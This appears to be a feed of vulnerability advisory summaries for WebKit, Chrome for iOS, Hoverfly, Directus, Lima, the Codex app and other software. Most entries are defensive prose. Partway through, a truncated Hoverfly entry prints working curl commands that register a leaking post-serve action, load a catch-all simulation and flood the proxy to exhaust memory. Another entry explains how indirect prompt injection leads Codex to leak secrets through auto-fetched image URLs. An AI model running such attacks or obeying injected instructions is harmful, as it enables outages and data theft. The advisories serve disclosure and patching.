Use-after-free memory corruption in Safari's web content processing causes an unexpected application crash across Apple platforms. Affected are Safari, iOS, iPadOS, and macOS Tahoe prior to version 26.5.2; exploitation requires only that a user visits or loads maliciously crafted web content, making drive-by delivery via a malicious webpage the primary vector. Impact is confined to availability - a forced Safari crash (denial of service) - with no confirmed confidentiality or integrity consequences. No public exploit code or active exploitation has been identified at time of analysis.
Denial-of-service memory corruption in Apple's WebKit engine affects Safari, iOS/iPadOS, and macOS Tahoe before version 26.5.2, where processing maliciously crafted web content triggers an unexpected process crash. The CVSS vector scores only availability impact (A:H) with no confidentiality or integrity loss, indicating a crash rather than code execution. There is no public exploit identified at time of analysis, and the EPSS probability is very low (0.16%), consistent with a browser-rendering DoS reported internally by Apple rather than an actively exploited threat.
Use-after-free in Safari's web content processing engine causes denial of service across Apple platforms, affecting Safari, iOS/iPadOS, and macOS prior to the 26.5.2 release line. The CVSS vector (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) confirms remote, unauthenticated triggering requiring only that a user visit attacker-controlled web content, with impact limited to availability - specifically an unexpected Safari crash. No active exploitation has been confirmed (not listed in CISA KEV), and no public exploit code has been identified at time of analysis.
Memory corruption via use-after-free in Apple's WebKit browser engine allows remote attackers to corrupt memory when a victim processes maliciously crafted web content on Safari, iOS/iPadOS, or macOS prior to 26.5.2. The CVSS 3.1 score of 8.8 reflects network-reachable exploitation requiring only that a user open a malicious page; no public exploit is identified at time of analysis and the issue is not listed in CISA KEV. Successful exploitation typically serves as the initial stage of a browser-based attack chain (often paired with a sandbox escape) to achieve code execution in the renderer.
Local privilege escalation and kernel memory corruption in Apple iOS, iPadOS (before 26.5.2) and macOS Tahoe (before 26.5.2) allows a malicious or compromised app to write kernel memory or force unexpected system termination by supplying improperly validated input to a privileged interface. Apple resolved the flaw through improved input sanitization. There is no public exploit identified at time of analysis, EPSS is low (0.18%, 8th percentile), and CISA SSVC records exploitation status as none, though it rates the technical impact as total and considers it automatable.
Path traversal (CWE-22) in Apple's WebKit-based browser engine exposes sensitive user information when processing maliciously crafted web content in Safari, iOS, iPadOS, and macOS Tahoe prior to version 26.5.2. The CVSS vector (AV:N/AC:L/PR:N/UI:R) confirms that an unauthenticated remote attacker needs only to induce a user to visit a malicious page, with no authentication or elevated privileges required. Apple has released fixes across all three platforms; no public exploit or CISA KEV listing has been identified at time of analysis.
Cross-origin data exfiltration in Apple Safari, iOS/iPadOS, and macOS Tahoe (all versions prior to 26.5.2) allows a malicious website to read data belonging to a different origin due to insufficient input validation. The CVSS vector (AV:N/AC:L/PR:N/UI:R) confirms the attack is network-delivered without authentication, requiring only that the victim visits an attacker-controlled page. No public exploit code or CISA KEV listing has been identified at time of analysis, and vendor-released patches are available for all affected platforms.
Out-of-bounds read in Apple's web content processing engine (WebKit) causes a browser process crash when a user visits a maliciously crafted webpage, affecting Safari, iOS/iPadOS, and macOS Tahoe. All versions prior to the 26.5.2 releases across those platforms are affected, making this a broad-surface denial-of-service vulnerability against Apple's default browser ecosystem. No public exploit code has been identified at time of analysis, and the vulnerability is not listed in CISA KEV; however, the low attack complexity and zero-authentication requirement lower the bar for opportunistic abuse once a malicious page is visited.
Safari's web content processing engine on iOS, iPadOS, and macOS Tahoe contains an out-of-bounds write (CWE-787) that causes an unexpected crash when rendering maliciously crafted web content. All Safari versions prior to 26.5.2 - and the underlying WebKit engine shipping with iOS/iPadOS and macOS Tahoe prior to 26.5.2 - are affected. Apple has released patched versions across all three platforms; no public exploit code or CISA KEV listing has been identified at time of analysis, and available impact is limited to a denial-of-service crash with no confirmed code execution path.
Use-after-free memory corruption in Apple Safari (and the broader iOS/iPadOS/macOS Tahoe platform) allows a malicious web extension to trigger an unexpected process crash, resulting in a denial-of-service condition. Affected versions span all Safari, iOS/iPadOS, and macOS Tahoe releases prior to 26.5.2, with Apple-confirmed fixes available across all three platforms. No active exploitation is confirmed (not listed in CISA KEV) and no public exploit code has been identified at time of analysis; the high attack complexity and requirement for a pre-installed malicious extension meaningfully constrain real-world risk.
Memory corruption via type confusion in Apple's WebKit browser engine allows attackers to corrupt memory by luring a victim to maliciously crafted web content, affecting Safari, iOS/iPadOS, and macOS before version 26.5.2. The flaw (CWE-843) is network-reachable but requires user interaction (visiting a page), and no public exploit has been identified at time of analysis. Apple has shipped patches across Safari 26.5.2, iOS/iPadOS 26.5.2, and macOS Tahoe 26.5.2.
Sensitive data leakage in Apple Safari, iOS/iPadOS, and macOS Tahoe before version 26.5.2 exposes users to cross-site data disclosure when visiting a malicious or compromised website. The root cause is a permissions enforcement deficiency (CWE-1264) that allows a web context to access data beyond its intended permission boundary. No active exploitation has been confirmed by CISA KEV, and the EPSS score of 0.17% (6th percentile) indicates low observed exploitation probability at time of analysis; however, the unauthenticated, low-complexity network vector makes this a realistic target for drive-by attacks once details become public.
Use-after-free memory corruption in Apple's WebKit engine causes unexpected process crashes when processing maliciously crafted web content. Affected platforms include Safari, iOS 26, iPadOS 26, and macOS Tahoe - all versions prior to 26.5.2. An unauthenticated remote attacker can trigger a denial-of-service condition by luring a user to a malicious web page; no public exploit has been identified at time of analysis, and this vulnerability is not listed in the CISA KEV catalog.
Use-after-free memory corruption in WebKit's web content processing causes unexpected process crashes across Safari, iOS, and iPadOS on all versions prior to 26.5.2. An unauthenticated remote attacker who can lure a user to visit a maliciously crafted web page can trigger this condition, resulting in a denial-of-service via browser process termination. No public exploit code has been identified at time of analysis and the vulnerability is absent from CISA KEV, though the use-after-free class in WebKit has historically been chained with other primitives to escalate impact.
Local credential theft in the garminconnect Python library (versions <= 0.3.4) stems from writing its OAuth token store to disk without an explicit file mode, so under the default umask 022 the file garmin_tokens.json - containing the DI refresh token - is created world-readable (0o644). Any unprivileged co-tenant on a shared Linux or macOS host can read the token and exchange it at Garmin's OAuth endpoint for fresh access tokens, gaining persistent access to the victim's Garmin Connect account. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the fix in 0.3.5 is confirmed and the issue is trivially reproducible under default configuration.
Server-side request forgery in Directus before 12.0.0 lets an authenticated user with file-upload rights abuse the /files/import endpoint to make the server fetch internal-only services and return their responses as downloadable files. The flaw stems from an incomplete SSRF denylist in api/src/request/is-denied-ip.ts, which treated 0.0.0.0 as a keyword but never blocked the literal address, so on Linux and macOS a request to 0.0.0.0 resolves to localhost and bypasses the protection. No public exploit identified at time of analysis and it is not in CISA KEV; EPSS was not provided.
{ "actionName": "leak", "remote": "http://192.0.2.1:9999/blackhole", "delayInMs": 0 }' ``` **Step 3: Load a catch-all simulation** ```bash curl -X PUT http://localhost:8888/api/v2/simulation \ -H "Content-Type: application/json" \ -d '{ "data": { "pairs": [{ "request": {"path": [{"matcher": "glob", "value": "*"}]}, "response": {"status": 200, "body": "ok", "postServeAction": "leak"} }], "globalActions": {"delays": [], "delaysLogNormal": []} }, "meta": {"schemaVersion": "v5.2"} }' ``` **Step 4: Flood with requests** ```bash for i in $(seq 1 10000); do curl -s -x http://localhost:8500 "http://target.com/req${i}" & [ $((i % 100)) -eq 0 ] && wait done ``` **Verified memory impact on Hoverfly v1.12.7:** ``` Memory before: 20,064 KB Memory after 50 requests: 23,376 KB Memory increase: 3,312 KB (66 KB per goroutine) ``` At this rate: - 1,000 requests = ~64 MB leaked - 10,000 requests = ~640 MB leaked - 100,000 requests = ~6.4 GB leaked → OOM crash An attacker with access to the admin API (unauthenticated by default) can cause a complete denial of service by: 1. Registering a remote post-serve action pointing to a non-responsive endpoint. 2. Loading a catch-all simulation that triggers the action on every request. 3. Sending proxy traffic, each request permanently leaks a goroutine and its associated memory.
Denial of service in Hoverfly's Diff mode (versions ≤ 1.12.7) lets any client with proxy access crash the entire process by sending concurrent requests. The `AddDiff()` function writes to the shared `responsesDiff` map without a mutex, so simultaneous proxy requests - the normal case for a proxy - trigger Go's built-in concurrent-map detector, producing an unrecoverable `fatal error: concurrent map read and map write` that kills the process. Publicly available exploit code exists (a working POC is embedded in the GitHub advisory), though there is no public exploit identified as actively used in the wild and no KEV listing.
Privilege elevation in Microsoft 365 Copilot for iOS lets a remote, unauthenticated attacker gain elevated access after a targeted user is lured into interacting with attacker-controlled content, per Microsoft's MSRC advisory. The flaw stems from improper access control (CWE-284) and carries a High CVSS 3.1 base score of 8.1 with high confidentiality and integrity impact but no availability impact. No public exploit has been identified at time of analysis and it is not listed in CISA KEV, but a vendor patch is available.
Spoofing in the Microsoft Bing Search app for iOS lets a remote attacker present deceptive or overlaid UI content that misleads the victim, because the app improperly restricts how rendered UI layers or frames are displayed (CWE-1021, a UI-redressing/clickjacking class of flaw). An unauthenticated attacker who lures a user into interacting with attacker-controlled content can manipulate what the user sees and trusts, potentially inducing them to act on falsified information. Microsoft has released a fix; there is no public exploit identified at time of analysis and it is not listed in CISA KEV.
Authentication bypass by spoofing in the Elixir ueberauth_apple strategy (0.1.0 through 0.6.1) allows full account takeover because the callback id_token's signature is checked against Apple's JWKS but its registered claims are never validated. Remote unauthenticated attackers who obtain any Apple-signed token carrying the victim's sub - an expired token or one issued to a sibling client in the same Apple developer team - can replay it to log in as the victim. No public exploit identified at time of analysis, but the vendor-confirmed fix (0.6.2) and a clear replay path make this a high-priority auth flaw; EPSS and KEV data were not provided.
PDF save functionality in Firefox for iOS allows maliciously crafted page titles to manipulate the output file path, enabling overwrites of existing PDF files or bundled application content within the Firefox iOS sandbox. All versions prior to 152.4 on Apple iOS devices are affected. An attacker operating a malicious website can lure a user into saving a page as PDF, causing the crafted title to resolve to an unintended file path within the app sandbox - potentially corrupting application state or stored documents. No public exploit has been identified at time of analysis, though SSVC classifies the vulnerability as automatable with partial technical impact.
Local privilege escalation in Lima (lima-vm) before 2.1.3 lets any unprivileged user inside a guest VM reach root when the instance runs the QEMU driver with the guest agent enabled. Because the world-reachable /run/lima-guestagent.sock exposes address tunneling - including Unix sockets for privileged daemons such as D-Bus - an in-guest attacker can proxy to root-owned services and execute arbitrary commands as root. No public exploit identified at time of analysis, and it is not listed in CISA KEV.
Open redirect bypass in openrun prior to v0.17.7 allows remote unauthenticated attackers to redirect victims to arbitrary external URLs by exploiting a double-slash path prefix that evades the application's host/scheme validation. The referrer-based redirect logic correctly validates the host and scheme but passes the extracted path `//attacker.com` to the Location header, which browsers interpret as a protocol-relative URL and resolve to an external destination. A proof-of-concept is publicly documented in the security advisory; no active exploitation has been confirmed by CISA KEV at time of analysis.
Privilege escalation in Palo Alto Networks Prisma® Browser on macOS enables a locally authenticated administrator with access to the local filesystem to perform actions at root privilege level. The vulnerability is scoped exclusively to macOS deployments of Prisma Browser - no other platforms or Palo Alto products are implicated per the advisory. No public exploit identified at time of analysis; the CVSS 4.0 base score of 2.0 reflects the substantial exploitation prerequisites that materially constrain real-world risk despite the full-system impact potential at root level.
Improper certificate validation in the Palo Alto Networks Prisma Access Agent for iOS exposes VPN tunnel traffic to interception and manipulation by a network-adjacent attacker. The flaw (CWE-295) enables a man-in-the-middle position to defeat the agent's TLS/certificate trust chain, allowing an adversary to read or alter traffic that the iOS client believes is securely tunneled. Exploitation is limited to iOS deployments - the Windows, macOS, Linux, Android, and ChromeOS agents are confirmed unaffected. No public exploit code exists and the vulnerability is not listed in the CISA KEV catalog.
Multiple protection mechanism failures in the Data Loss Prevention (DLP) component of Palo Alto Networks Prisma Access Agent for Windows enable a local authenticated user to bypass DLP policy enforcement controls. Only the Windows platform is affected; the Prisma Access Agent for macOS is explicitly excluded per vendor advisory. No public exploit code or active exploitation has been identified at time of analysis, though the CVSS 4.0 supplemental urgency rating of Amber and high confidentiality/integrity impact on the vulnerable system make this a meaningful insider threat risk.
Unauthenticated remote code execution in Joro ≤ v1.1.0 (BishopFox's offensive-security tooling) allows an attacker to gain a shell as the operator's user when that operator merely visits a malicious web page. In the default proxy mode, Joro exposes an unauthenticated local API on 127.0.0.1:9090 with a wildcard CORS policy; because plugin uploads use the CORS-safelisted multipart/form-data content type, cross-origin JavaScript can upload a native Go plugin and trigger a restart through the operator's browser with no preflight or credentials, and the plugin's init() executes on load. No public exploit is identified at time of analysis, but the advisory documents a complete, reproducible attack chain, and the assigned CVSS is 9.6 (Critical).
Setuptools prior to 83.0.0 fails to normalize Unicode filenames before matching them against MANIFEST.in exclusion patterns on macOS APFS and HFS+ filesystems, allowing files with NFD-normalized on-disk names to silently bypass NFC-encoded exclude, global-exclude, recursive-exclude, and prune directives and be packed into Python source distributions. Python package maintainers developing on macOS face a supply chain risk: sensitive files such as credentials, private keys, or environment configs that are correctly listed in MANIFEST.in for exclusion may still appear in tarballs published to PyPI or private registries. No public exploit has been identified at time of analysis, and the vulnerability is not listed in the CISA KEV catalog.
Pre-account-hijacking in the better-auth Node/TypeScript authentication library (versions < 1.6.11 on the stable line and all current `next` pre-releases) lets an unauthenticated attacker seize a victim's account by pre-registering the victim's email via `/sign-up/email`, then having the victim's later OAuth/SSO sign-in implicitly linked to the attacker's row. The result is a single account the attacker controls with a working password login plus the victim's OAuth identity, and the link-time verification flip defeats `requireEmailVerification: true`. No public exploit identified at time of analysis; not listed in CISA KEV, though the flaw is the same class as Microsoft nOAuth (2023) and the Sign in with Apple JWT flaw (2020).
Address bar spoofing in Firefox for iOS allows a remote unauthenticated attacker to display a trusted origin in the browser's address bar while the victim views and interacts with fully attacker-controlled content - a classic and effective phishing enabler. The attack exploits a race condition in navigation handling: a malicious page enqueues a synchronous JavaScript dialog at the moment a user navigates away, freezing the address bar on the destination's legitimate origin while the malicious page's content continues to render. No public exploit code has been identified and EPSS is 0.15% (4th percentile), indicating no observed widespread exploitation; however, the technique is conceptually simple and phishing value is high.
Remote image auto-fetch in the OpenAI Codex desktop app for macOS (versions prior to 26.527.31326) enables silent exfiltration of session secrets via indirect prompt injection. An attacker who can place malicious instructions into content processed by Codex - such as a tool result, API response, or file read during a session - can manipulate the model into generating a Markdown image tag whose URL encodes sensitive data; the app then automatically fetches that URL, transmitting API keys, source code, or tool-returned data to an attacker-controlled server with no additional user action. No active exploitation is confirmed (not listed in CISA KEV), no public proof-of-concept is identified, and EPSS sits at 0.16% (6th percentile), indicating low current exploitation probability despite the high-value target profile of affected users.
OS command injection in create-react-app's react-dev-utils component enables remote code execution on macOS developer workstations running version 5.0.1 or earlier. The vulnerability resides in the startBrowserProcess function of openBrowser.js, which processes unsanitized input that reaches a shell invocation. A publicly available proof-of-concept exploit exists via the project's GitHub issue tracker; no vendor patch has been released and the maintainers have not responded to disclosure, leaving the entire supported version history of this widely-used but now-archived tool permanently unpatched.
Source-code disclosure in the Algernon web/application server (Go, xyproto/algernon, tested at v1.17.8) lets an unauthenticated remote client retrieve the raw source of any public-path server-side script on Windows hosts by appending an NTFS-equivalent suffix (::$DATA, a trailing dot, or a trailing space) to the URL. Because filepath.Ext() does an exact suffix match, these forms are not recognized as .lua/.tl/.po2/.amber/.frm and fall through to the raw-file branch, while NTFS canonicalizes the name back to the real script, exposing embedded database credentials and the SetCookieSecret value used to forge session cookies. Publicly available exploit code exists (full PoC in the GitHub advisory); no public exploit identified as actively exploited and this is not in CISA KEV.
SQL injection in the iNET Webkit WordPress plugin (version 1.2.4 and prior) lets authenticated users holding at least the Contributor role inject arbitrary SQL through unsanitized input, exposing the WordPress database. Reported by Patchstack and carrying a CVSS 8.5 (scope-changed) rating, it enables read access to sensitive data such as user credentials and secrets. No public exploit identified at time of analysis, and it is not listed in CISA KEV.
Local privilege escalation in Cato Client on macOS allows an authenticated low-privileged user to gain root by chaining two flaws in the PrivilegedHelperTool XPC service: improper certificate validation (CWE-295) that accepts self-signed certificates to bypass XPC caller verification, and a TOCTOU race condition exploitable via symlink swap during package installation. All Cato Client (SDP Client) versions prior to 5.13.1 on macOS are affected. A proof-of-concept exists per the CVSS 4.0 supplemental metric E:P, and the AU:Y (Automatable) tag indicates the exploit chain can be scripted - elevating practical urgency despite the absence of a CISA KEV listing.
Incorrect security UI in Passwords in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)
UI spoofing in Google Chrome for iOS prior to 150.0.7871.47 allows a remote attacker to manipulate browser interface elements via a crafted HTML page, provided the attacker can lure the victim into performing specific UI gestures. The root cause is insufficient validation of untrusted HTML input (CWE-20) within Chrome's iOS-specific rendering layer, resulting in low-integrity and low-availability impact. No public exploit code has been identified at time of analysis, and this vulnerability has not been added to the CISA KEV catalog; Chromium's own severity classification is Low.
Insufficient validation of untrusted input in Chrome for iOS in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)
Inappropriate implementation in Chrome for iOS in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Low)
Omnibox (URL bar) spoofing in Google Chrome for iOS prior to 150.0.7871.47 allows a remote attacker to display a fraudulent URL in the browser's address bar by delivering a crafted HTML page. The root cause is classified as CWE-451 (UI Misrepresentation of Critical Information), meaning the security UI fails to accurately reflect the true origin of displayed content - a condition that directly undermines phishing defenses. No public exploit code has been identified at time of analysis, and the EPSS score of 0.18% (8th percentile) indicates very low observed exploitation pressure, consistent with the Chromium team's own 'Low' severity rating.
Use after free in Chrome for iOS in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Low)
No-referrer policy bypass in Google Chrome for iOS prior to 150.0.7871.47 allows a remote attacker to capture referrer URL information that the browser was supposed to suppress. Exploitation requires user interaction - the victim must visit a crafted HTML page served by the attacker - and exploits a client-side enforcement gap (CWE-602) specific to the iOS build of Chrome. EPSS is 0.19% (9th percentile) and no active exploitation or KEV listing exists, consistent with the Low Chromium severity rating.
Side-channel information leakage in the WebAuthentication component of Google Chrome on iOS (prior to 150.0.7871.47) exposes cross-origin data to remote attackers via a crafted HTML page, requiring only that a victim visit attacker-controlled content. The CVSS Confidentiality:High rating reflects the category of cross-origin data exposure, while Chromium's own internal severity classification of Low and an EPSS score of 0.21% (11th percentile) both signal that practical exploitation is considered unlikely at scale. No public exploit is identified at time of analysis and no CISA KEV listing exists.
Universal Cross-Site Scripting (UXSS) in Chrome's Omnibox on iOS enables remote attackers to inject arbitrary scripts or HTML across security origins by luring users into performing specific UI gestures on a crafted page. Affected versions are Chrome for iOS prior to 150.0.7871.47; the desktop channel is not affected. No public exploit code or active exploitation has been identified at time of analysis, and EPSS sits at 0.18% (8th percentile), consistent with Chromium's own 'Low' severity rating despite the scope-changed CVSS vector.
Use after free in Chrome for iOS in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Low)
Navigation restriction bypass in Google Chrome for iOS prior to 150.0.7871.47 allows a remote, unauthenticated attacker to circumvent browser-enforced navigation controls by delivering a crafted HTML page. The flaw is confined to the iOS platform - Chrome on Android, Windows, macOS, and Linux is unaffected - and requires the victim to actively visit the attacker-controlled page (UI:R). With a CVSS score of 4.3 (Medium), an EPSS of 0.19% (9th percentile), no CISA KEV listing, and a Chromium-internal severity rating of Low, this vulnerability carries minimal real-world exploitation risk but warrants patching given its zero-privilege attack vector.
UI spoofing in Google Chrome for iOS prior to 150.0.7871.47 allows a remote attacker to misrepresent security indicators to users who are socially engineered into performing specific UI gestures on a crafted HTML page. The root cause is incorrect rendering of security UI elements (CWE-451), classified by the Chromium team as Low severity. No public exploit code exists and the vulnerability is not listed in the CISA KEV catalog, aligning with the modest CVSS 4.2 score and the high-complexity attack requirements.
Insufficient validation of untrusted input in Chrome for iOS in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)
Omnibox (URL bar) spoofing in Google Chrome for iOS prior to 150.0.7871.47 enables a remote attacker to display falsified URL content to a victim user via a crafted HTML page. Exploitation requires convincing the target to perform specific UI gestures while visiting the malicious page, making this a phishing-enabler rather than a direct code-execution primitive. No public exploit code and no active exploitation (CISA KEV) have been identified at time of analysis; Google has released a fix in the 150.0.7871.47 stable channel update.
UI spoofing in Google Chrome for iOS prior to version 150.0.7871.47 enables a remote attacker to misrepresent page identity or security state through a specially crafted HTML page, exploiting an inappropriate implementation classified under CWE-451. The vulnerability affects only the iOS-specific Chrome codebase - not Chrome on other platforms - and requires user interaction (visiting an attacker-controlled page). No public exploit code has been identified and EPSS sits at 0.21% (11th percentile), indicating low observed exploitation probability; it is not listed in the CISA KEV catalog.
Inappropriate implementation in Chrome for iOS in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)
Cross-origin data leakage in Google Chrome on iOS (prior to 150.0.7871.47) stems from an inappropriate implementation in the ScriptInjections subsystem, exploitable by a remote attacker who can lure a victim to a crafted HTML page. The flaw allows the attacker's origin to read data belonging to a different, protected origin - a fundamental violation of the Same-Origin Policy on Apple's iOS platform. No public exploit code has been identified at time of analysis, EPSS places exploitation probability at 0.22% (13th percentile), and SSVC signals no observed active exploitation, making this a medium-priority patch item despite its cross-origin impact.
Use after free in Chrome for iOS in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)
Navigation restriction bypass in Google Chrome for iOS (prior to 150.0.7871.47) allows a remote attacker to subvert browser-enforced navigation controls by luring a user into performing specific UI gestures on a crafted HTML page. Classified as CWE-20 (Improper Input Validation), the flaw undermines integrity by permitting unauthorized navigation that the browser is intended to block. No public exploit code exists and EPSS sits at 0.22% (13th percentile), indicating low observed exploitation probability; the vulnerability is not listed in CISA KEV.
UI spoofing in Google Chrome for iOS prior to version 150.0.7871.47 allows a remote attacker to misrepresent browser interface elements - such as the address bar or origin indicators - by serving a crafted HTML page, potentially deceiving users into trusting malicious content. The CVSS vector (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) confirms network-reachable exploitation with no privilege requirement but mandatory user interaction, limiting impact to partial integrity loss with no confidentiality or availability effect. No public exploit or active exploitation has been identified; an EPSS score of 0.21% at the 11th percentile indicates very low current exploitation probability, and this vulnerability does not appear in the CISA KEV catalog.
Heap corruption in Google Chrome for iOS before 150.0.7871.47 lets a remote attacker who lures a user through specific in-page UI gestures on a crafted HTML page trigger a use-after-free (CWE-416), potentially leading to arbitrary code execution in the renderer. Rated Medium by the Chromium security team but scored CVSS 8.8 due to full confidentiality/integrity/availability impact; there is no public exploit identified at time of analysis and it is not listed in CISA KEV. EPSS is low at 0.21% (11th percentile), consistent with a freshly patched browser bug that has no known weaponization.
Cross-origin data leakage in Google Chrome's Autofill subsystem on iOS (versions prior to 150.0.7871.47) enables remote attackers to read sensitive data across origin boundaries by luring victims into performing specific UI gestures on a crafted page. Rooted in CWE-346 (Origin Validation Error), the Autofill policy enforcement layer fails to maintain proper origin isolation under targeted interaction conditions. With an EPSS of 0.21% (11th percentile) and no CISA KEV listing, no public exploit identified at time of analysis, though the CVSS-rated High confidentiality impact warrants prompt patching given Chrome's broad iOS deployment footprint.
UI spoofing in Google Chrome's Safe Browsing component on iOS enables remote attackers to mislead users through a crafted HTML page, potentially causing them to dismiss or misinterpret security warnings. Only Chrome for iOS versions prior to 150.0.7871.47 are affected; the desktop channel is not impacted by this specific flaw. No public exploit code exists and exploitation probability is very low (EPSS 0.21%, 11th percentile), though the network-accessible, zero-authentication attack surface keeps it relevant where phishing-style delivery is feasible.
Navigation restriction bypass in Google Chrome's Omnibox on iOS (prior to 150.0.7871.47) enables a remote attacker to circumvent address bar security controls through insufficient input validation, contingent on user interaction with specific UI gestures during exposure to malicious network traffic. The integrity impact is rated High (I:H) with no confidentiality or availability impact, consistent with a content/navigation spoofing class of vulnerability. No public exploit code or CISA KEV listing has been identified; EPSS score of 0.20% (10th percentile) indicates low observed exploitation probability at time of analysis.
UI spoofing in Google Chrome's iOSWeb component on iOS allows remote attackers to misrepresent interface elements to users running versions prior to 150.0.7871.47. The vulnerability, rooted in an inappropriate implementation (CWE-451), is triggered when a user performs specific UI gestures on a crafted HTML page, enabling spoofing of security-critical browser interface elements such as the address bar or permission dialogs. No public exploit or active exploitation (CISA KEV) has been identified at time of analysis; the high attack complexity and mandatory user interaction meaningfully constrain real-world risk.
Race condition exploitation in Google Chrome for iOS (prior to 150.0.7871.47) exposes potentially sensitive data from process memory to a local attacker with physical device access. The flaw is rooted in improper synchronization (CWE-362) and requires high attack complexity to successfully win the timing window. No public exploit has been identified and the vulnerability is not listed in CISA KEV; the vendor has released a patching fix in the 150.0.7871.47 stable channel update.
Navigation restriction bypass in Google Chrome's Safe Browsing implementation on iOS allows a remote, unauthenticated attacker to circumvent phishing and malicious-site protections via a specially crafted HTML page, affecting all Chrome for iOS versions prior to 150.0.7871.47. The flaw is classified as CWE-693 (Protection Mechanism Failure), meaning the Safe Browsing guard can be rendered ineffective rather than defeated through cryptographic or authentication means. No public exploit or CISA KEV listing has been identified, and the EPSS score of 0.23% (14th percentile) signals low current exploitation probability - but the zero-prerequisite network delivery and high integrity impact make this a meaningful risk for iOS users who have not updated.
UI spoofing in Google Chrome for iOS prior to version 150.0.7871.47 enables remote attackers to misrepresent browser interface elements - such as address bars or security indicators - by delivering a crafted HTML page to a victim on an iOS device. Rooted in CWE-451 (UI Misrepresentation of Critical Information), the flaw exploits an inappropriate implementation specific to Chrome's iOS code path, which differs from desktop Chrome due to WKWebView constraints imposed by Apple. No public exploit code exists, CISA SSVC rates exploitation as none, and EPSS sits at the 12th percentile, indicating minimal real-world threat at time of analysis.
Cross-origin data leakage in Google Chrome for iOS prior to 150.0.7871.47 exposes sensitive information from other origins when a remote attacker convinces a victim to perform specific UI gestures on a crafted HTML page. The flaw stems from an inappropriate implementation in the iOS-specific Chrome browser layer, classified under CWE-451 (UI Misrepresentation), and enables confidentiality compromise without requiring attacker privileges. No public exploit code has been identified at time of analysis, and EPSS at 0.22% (12th percentile) signals low near-term automated exploitation risk.
Side-channel information leakage in WebAuthentication within Google Chrome on iOS (versions prior to 150.0.7871.47) enables a remote attacker to infer cross-origin data by directing a victim to a crafted HTML page. The CVSS vector (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N) confirms network-exploitable impact with high confidentiality loss, constrained by mandatory user interaction and scoped exclusively to the iOS platform. No public exploit identified at time of analysis; EPSS at 0.25% (16th percentile) signals low near-term exploitation probability, and no CISA KEV listing is present.
Insufficient policy enforcement in Web Authentication (Passkeys & Security Keys) in Google Chrome on iOS prior to 150.0.7871.47 allowed an attacker in a privileged network position to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)
Sandboxed arbitrary code execution in Google Chrome for iOS before 150.0.7871.47 lets an attacker who convinces a user to open a malicious file run code inside the browser's sandbox due to insufficient validation of untrusted input. Google rates the Chromium severity High and ships the fix in 150.0.7871.47; EPSS is low (0.15%, 4th percentile) and there is no public exploit identified at time of analysis. The flaw requires user interaction (opening the file) and, per the description, the resulting execution is confined to the sandbox rather than the underlying OS.
Insufficient validation of untrusted input in Chrome for iOS in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High)
Insufficient validation of untrusted input in Chrome for iOS in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Omnibox spoofing in Google Chrome for iOS prior to 150.0.7871.47 enables remote unauthenticated attackers to display a falsified URL in the browser address bar by delivering a crafted HTML page to an iOS user. The flaw is classified CWE-451 (UI misrepresentation of critical information) and is iOS-platform-specific, with no impact on Chrome for Android, Windows, macOS, or Linux. No active exploitation is confirmed - the vulnerability is not listed in CISA KEV and EPSS sits at 0.22% (12th percentile) - but the spoofing primitive is a classic enabler of targeted phishing campaigns against mobile users.
Sandbox escape in Google Chrome for iOS prior to 150.0.7871.47 lets a remote attacker who has already compromised the renderer process break out of the sandbox via a crafted HTML page, escalating from renderer-level code execution to broader access on the device. The flaw stems from insufficient policy enforcement (CWE-20) and carries a High Chromium severity rating with a CVSS 8.3 (scope-changed) score. There is no public exploit identified at time of analysis and it is not in CISA KEV; EPSS probability is low at 0.21% (11th percentile).
Universal Cross-Site Scripting (UXSS) in Google Chrome for iOS prior to 150.0.7871.47 enables a remote attacker to inject arbitrary scripts or HTML across origins by exploiting insufficient input validation triggered through specific user UI gestures on a crafted page. The scope change (S:C in CVSS) is the critical dimension here - successful exploitation bypasses the same-origin policy, potentially granting the attacker script execution in the context of arbitrary origins within the browser session. No public exploit code has been identified and EPSS sits at just 0.20% (11th percentile), indicating low observed exploitation activity despite the high-impact class of vulnerability.
Side-channel information leakage in Safe Browsing in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High)
Sensitive process memory exposure in Google Chrome for iOS prior to 150.0.7871.47 enables a physically present attacker to read potentially sensitive data from the browser's memory without authentication. The root cause is insufficient data validation (CWE-20) within the iOS-specific Chrome implementation. No public exploit code or CISA KEV listing has been identified at time of analysis, and the physical access requirement (CVSS AV:P) significantly constrains real-world attacker opportunity.
Remote code execution in Google Chrome on iOS prior to 150.0.7871.47 stems from a use-after-free in the browser's Import component, allowing a remote attacker who lures a victim into opening a malicious file and performing specific UI gestures to execute arbitrary code. Rated High by Chromium and CVSS 7.5, the flaw has no public exploit identified at time of analysis and a low EPSS of 0.24% (15th percentile), consistent with its high attack complexity and required user interaction. A vendor patch is available in the June 2026 Stable channel update.
